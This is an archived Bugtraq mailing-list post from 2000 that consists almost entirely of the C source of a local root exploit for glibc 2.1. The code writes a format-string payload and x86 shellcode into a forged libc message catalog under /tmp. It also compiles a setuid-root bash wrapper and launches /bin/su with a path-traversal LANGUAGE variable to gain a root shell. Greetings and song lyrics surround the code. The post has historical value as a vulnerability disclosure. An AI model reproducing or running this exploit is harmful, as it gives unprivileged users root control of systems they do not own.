Bugtraq mailing list archives
glibc language
From: Maurycy Prodeus <z33d () ETH-SECURITY NET>
Date: Fri, 8 Sep 2000 00:00:45 +0200
/* * "Bylem pijany (...) zaczela sciagac spodnie, nie wiedzialem co robic (...)" * - greg () tenet pl - * * GLIBC 2.1 language exploit by z33d () eth-security net (C) 2000 * with bypassing Solar Designer Stack Patch * * Dedicated to greg () tenet pl * * It doesn't work. ;> Try use gdb to find special value. * Tested on Debian 2.1/2.2 ziemniak * Greetz: * - abusers from if.pwr.wroc.pl :))) (IF-NET) * - y3t1, dyziu, team140 riders - brunswick bedzie nasz ... :) * - lcamtuf - argante rulz :) * - Sierota, oczy niebieskie mowia wprost, wczoraj wyjatkowo aktywna noc... * :)))))))))))))))))))))) * - secure () poz sm pl no i wogole #sigsegv * funkysh, cliph, yeti, detergent, kris, ja, venglin, crashkill, ... * - breslau killers z vx na czele :> * - ppl from my so called real life * - kefir truskawkowy * most code I ripped :> */ #include <stdlib.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <sys/stat.h> #define DEFAULT_ALIGNMENT 2 // #define DEFAULT_RETLOC 0xbfffd2ff // #define DEFAULT_RETLOC 0xbffff798 #define DEFAULT_RETLOC 0xbffff770 #define DEFAULT_BUFFER_SIZE 2048 #define PATH "/tmp/LC_MESSAGES" char shellcode[]= "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "dupaa" "\x31\xc0\xb0\x46\x31\xdb\x89\xd9\x4b\xcd\x80" "\xeb\x1f\x5e\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/sh"; // very special shellcode, 15 min ;> big thanks to yeti char sh[]= "#include <stdlib.h>\n" "#include <stdio.h>\n" "#include <unistd.h>\n" "int main(){\n" "setuid(0);\n" "setgid(0);\n" "system(\"/bin/bash\");\n" "}\n"; int main(int argc, char *argv[]) { char *buff, *buff1, *ptr; char *env[3]; long shell_addr,retloc=DEFAULT_RETLOC; int align=DEFAULT_ALIGNMENT; int bsize=DEFAULT_BUFFER_SIZE; int i,reth,retl,num=132; // maybe 121 struct stat j; FILE *fp; if (argc > 1) sscanf(argv[1],"%x",&retloc); if (argc > 2) num = atoi(argv[2]); printf("Stay sharp ...\n"); printf("Usages: %s <RETloc> <num> (118<num<140)\n",argv[0]); if (!(buff = malloc(1024))) { printf("Can't allocate memory.\n"); exit(0); } if (!(buff1 = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } printf("Using RET location address: 0x%x\n", retloc); shell_addr=0x00124270; // or 0x00124250 printf("Using Shellcode address: 0x%x\n", shell_addr); reth = (shell_addr >> 16) & 0xffff ; retl = (shell_addr >> 0) & 0xffff ; ptr = buff; for (i = 0; i <2 ; i++, retloc+=2 ){ memset(ptr,'A',4); ptr += 4 ; (*ptr++) = retloc & 0xff; (*ptr++) = (retloc >> 8 ) & 0xff ; (*ptr++) = (retloc >> 16 ) & 0xff ; (*ptr++) = (retloc >> 24 ) & 0xff ; } memset(ptr,'A',align); ptr = buff1; for(i = 0 ; i < num ; i++ ) { memcpy(ptr, "%.8x", 4); ptr += 4; } sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(retl - num*8), (0x10000 + reth - retl)); mkdir(PATH,0755); chdir(PATH); fp = fopen("libc.po", "w+"); if (!fp){ printf("Skript kidies ?\n"); exit(0); } fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n"); fprintf(fp,"msgstr \"%s%s\\n\"", buff1,shellcode); fclose(fp); system("/usr/bin/msgfmt libc.po -o libc.mo"); i=open("/tmp/LC_MESSAGES/libc.mo",O_RDWR); fstat(i,&j); lseek(i,j.st_size-2,SEEK_SET); write(i,"\0\0\0\0\0\0",6); close(i); fp = fopen("/tmp/sh.c","w+"); if (!fp){ printf("Skript kidies ?\n"); exit(0); } fprintf(fp,"%s",sh); fclose(fp); system("cd /tmp;gcc sh.c -o sh"); env[0] = "LANGUAGE=sk_SK/../../../../../../tmp"; env[1] = (char *)0 ; execle("/bin/su","su","-u", buff, NULL,env); perror("execle"); return 0; } - z33d - -- Freestate Let yourself go Let yourself go Let your senses overflow Step out of your cage And onto the stage It's time to start Playing your part Freedom awaits Open the gates Open your mind Freedom's a state / Depeche Mode
Current thread:
- glibc language Maurycy Prodeus (Sep 07)